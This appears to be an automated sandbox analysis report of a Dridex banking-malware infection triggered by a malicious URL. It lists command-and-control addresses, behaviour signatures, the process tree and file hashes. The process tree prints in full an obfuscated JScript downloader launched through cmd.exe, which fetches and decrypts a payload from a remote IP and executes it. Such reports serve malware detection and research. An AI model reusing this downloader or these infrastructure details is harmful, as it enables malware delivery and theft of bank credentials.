Analysis
-
max time kernel
70s -
max time network
143s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
01-07-2021 05:48
General
-
Target
https://exitmagall.xyz/iduew73
-
Sample
210701-vjg5t6h6ma
Malware Config
Extracted
dridex
10111
104.168.155.129:443
142.4.219.173:4664
176.31.117.84:9443
Signatures
-
Dridex
Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.
-
CryptOne packer 2 IoCs
Detects CryptOne packer defined in NCC blogpost.
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 TTPs 40 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://exitmagall.xyz/iduew731⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3904 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://45.138.24.31/?Mjk4MDgx&MNNPx&end=twix&start=why&yus=80spinny.127zg59.406q1z8o8&s2hdfgdfgt4=6NbP0zYA0SD2Izfz-3ORZ_xOWPPk7DPRAOzrl-CelzSp_B8JOQFOwLli0HSfwczlIpYUlkV8q-qh0KBzx6c0ZaC9BzbUQhG96LIVLA46A&oafghc1n4=w3_QMvXcJx3QFYPJKfncT&ZkdSDjMTYwOTA=" "2""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://45.138.24.31/?Mjk4MDgx&MNNPx&end=twix&start=why&yus=80spinny.127zg59.406q1z8o8&s2hdfgdfgt4=6NbP0zYA0SD2Izfz-3ORZ_xOWPPk7DPRAOzrl-CelzSp_B8JOQFOwLli0HSfwczlIpYUlkV8q-qh0KBzx6c0ZaC9BzbUQhG96LIVLA46A&oafghc1n4=w3_QMvXcJx3QFYPJKfncT&ZkdSDjMTYwOTA=" "2""4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c 9ilqj.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9ilqj.exe9ilqj.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
89b2cc9646a78de14893d414780a853f
SHA1866a2d80b1eb0e821e873430d9962e67fadeff19
SHA2568f5e476d223b4fa079d065225975fea02c5e716cc63048fafb387486f83a3f7b
SHA512811ff553b3e6635fff8dc9a62c1251b2c5c271444cfa2672e1159ffcf98bd62c74056135453f8534bf228eb95b2d7b0fcc04de079db6ea621f9e6e27dd5725e4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
b8b651f620bb1c2e89be9b3be78e307a
SHA11a4f54890eb90b63933d3ed5284fc84a6f28167e
SHA2563c665e9dda2dd7673ea723c1e49611af19639982529f58fd44da03500430264d
SHA512f6a7a8452c202a301eb719be18c9458ab4a2dcdb6248238294a787bfd1ca6ab0e0df6c37a9912aafad930ed85770b92b03c8ca99c6409c3f65c6a3345b74c9d2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\A91D2DM4.cookieMD5
2d9862a2f7f5926eb0d94326c779f64a
SHA1fee2e1297f1dfe1abc7eb263cd1a894e0e82ca27
SHA2563f910d4b153df236720e538c46e222344d4835224dd6bfea6c473cf4eefe5a9f
SHA51256ff07fbfb1b12411404bb932a3cc4fa1a81e476a777d36fb31654b1422f3a2152e88dd198fc20160be01edc9cca1e807d4e54b9283d9aa296bdb692afad230d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\MQX7LDGQ.cookieMD5
778e71e3c6b9ceb52140bbff5d896e95
SHA194973e356b5566b09290880103a3f3eff14b361b
SHA2568f8715dbf6a00cee529ca8fa295a2552488c072a535bb4b790587ffa5f35b592
SHA51265716acd610c204c604ee0f1de119d8267af501945575d106124d80a1d970b85b2eea2941f9a8efc1e56bc319d49181f4787ef3b632273fb3c80216041efa4ea
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
60fc00422b399db85f87d41b8328976d
SHA1bb85034acad8025f97e5bb236443debaf8926e4b
SHA256c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
SHA51216fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151
-
C:\Users\Admin\AppData\Local\Temp\9ilqj.exeMD5
d4f2b07163622ec627b822181dacc7de
SHA14cd7f98608e23f0466cd07963a10b14b7f9deca0
SHA256abe0f535bac505b567371572e6babab960e6abead6051340d04560c2f343d31c
SHA5123a35a562cf6fb245dce6917c42fc0d84c913fee6d15c33322842c211fe1b1e6a88b4ceeaca492c50bb877e4926dd6683fd440f91646f4547077236c2e8434eee
-
C:\Users\Admin\AppData\Local\Temp\9ilqj.exeMD5
d4f2b07163622ec627b822181dacc7de
SHA14cd7f98608e23f0466cd07963a10b14b7f9deca0
SHA256abe0f535bac505b567371572e6babab960e6abead6051340d04560c2f343d31c
SHA5123a35a562cf6fb245dce6917c42fc0d84c913fee6d15c33322842c211fe1b1e6a88b4ceeaca492c50bb877e4926dd6683fd440f91646f4547077236c2e8434eee
-
memory/412-115-0x0000000000000000-mapping.dmp
-
memory/2152-117-0x0000000000000000-mapping.dmp
-
memory/2704-119-0x0000000000000000-mapping.dmp
-
memory/3332-116-0x0000000000000000-mapping.dmp
-
memory/3904-114-0x00007FF858480000-0x00007FF8584EB000-memory.dmpFilesize
428KB
-
memory/3936-123-0x0000000000560000-0x000000000059C000-memory.dmpFilesize
240KB
-
memory/3936-124-0x0000000000400000-0x0000000000508000-memory.dmpFilesize
1.0MB
-
memory/3936-120-0x0000000000000000-mapping.dmp